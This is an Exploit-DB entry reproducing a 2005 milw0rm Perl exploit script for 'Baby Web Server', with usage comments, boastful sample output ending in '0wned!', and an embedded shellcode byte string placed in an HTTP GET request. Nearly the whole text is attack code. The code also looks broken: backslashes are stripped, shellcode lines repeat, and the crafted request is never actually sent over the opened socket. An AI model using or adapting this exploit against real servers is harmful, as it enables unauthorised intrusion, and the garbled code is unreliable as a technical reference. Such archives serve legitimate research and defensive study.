https://www.exploit-db.com/exploits/1099

漏洞细节尚未披露

#!/bin/perl
#
#     Baby Web Server Command Validation Exploit
# --------------------------------------------------
#        Infam0us Gr0up - Securiti Research
#
#
# E:>nc -v localhost 80
# Infam0us-Gr0up [127.0.0.1] 80 (http) open
# GET HTTP
#
# HTTP/1.0 400 Bad Request
# Server: Baby Web Server < --
# Set-Cookie: SESSIONID=00000001; path=/;version=1
# Last-Modified: Tue, 12 Jul 2005 06:43:05 GMT
#
#
# E:PERL>perl babyws.pl localhost test.txt E:Websitewww04adindex.html
#
# [+] Connecting to localhost..
# [+] Connected
# [+] Create Spl0it..
# [+] Sending Command Validation..
# [+] Now attacking..
# [+] Domain: localhost
# [+] Path:E: E:Websitewww04adindex.html
# [+] 0wned!
#
# Tested on Windows2000 SP4 (Win NT)
# Info : [email protected] / infamous.2hell.com
# Vendor URL: http://www.pablosoftwaresolutions.com/


use IO::Socket;
if(@ARGV!=3){
print "    Baby Web Server Command Validation Exploit n";
print "----------------------------------------------------n";
print "     Infam0us Gr0up - Securiti Researchnn";
print "[-]Usage: babyws.pl [target] [input] [path_file]n";
print "[?]Exam:  babyws.pl localhost test.txt e:wwwsite01default.htmnn";
exit(1);
}

$site = $ARGV[0];

my $infile = $ARGV[1];
my $path = $ARGV[2];

print "nn";
print "[+] Connecting to $site..n";

$sock = IO::Socket::INET->new(
PeerAddr => "$ARGV[0]",
PeerPort => 80,
Proto => "tcp")
or die "Unable to connect";

print "[+] Connectedn";
print "[+] Create Spl0it..n";

$sploit =
"xebx6ex5ex29xc0x89x46x10".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x80x43xc6x46x10x10x88x46".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x3fx41xcdx80xb0x3fx41xcd".
"x80x88x56x07x89x76x0cx87".
"xf3x8dx4bx0cxb0x0bxcdx80".
"xe8x8dxffxff";


print "[+] Sending Command Validation..n";
open(OUT, ">$path") or die("unable to open $path: $!");
open(IN, $infile) or die("unable to open $infile: $!");
@directories=<IN>;

$blah = "GET $sploit HTTP/1.0nHost: $sitenContent-length: 4nTESTn";

print "[+] Now attacking..n";

foreach (@directories) {
       chomp;
       print OUT "$_ --> ";
       s/ /%20/g;
        my $repl = (qq(PUT /$_/test.txt $blah));

       if ($repl =~ /not allowed/i) { print OUT "Not Allowedn"; }
       elsif ($repl =~ /403.4 Forbidden: SSL required/i) { print OUT "* 403.4 Forbidden: SSL required *n"; }
       elsif ($repl =~ /401 Unauthorized/i) { print OUT "401 Unauthorizedn"; }
       elsif ($repl =~ /Error 404/i) { print OUT "Error 404n"; }
       elsif ($repl =~ /Write Access Forbidden/i) { print OUT "Write Access Forbiddenn"; }
       elsif ($repl =~ /Unauthorized due to ACL on resource/i) { print OUT "Unauthorized due to ACL on resourcen"; }
       else { print OUT "*** SUCCESSFULL PUT ***n"; }
}
close($sock);
print "[+] Domain: $siten";
print "[+] Path: $ARGV[2]n";
print "[+] 0wned!n";
exit();

# milw0rm.com [2005-07-11]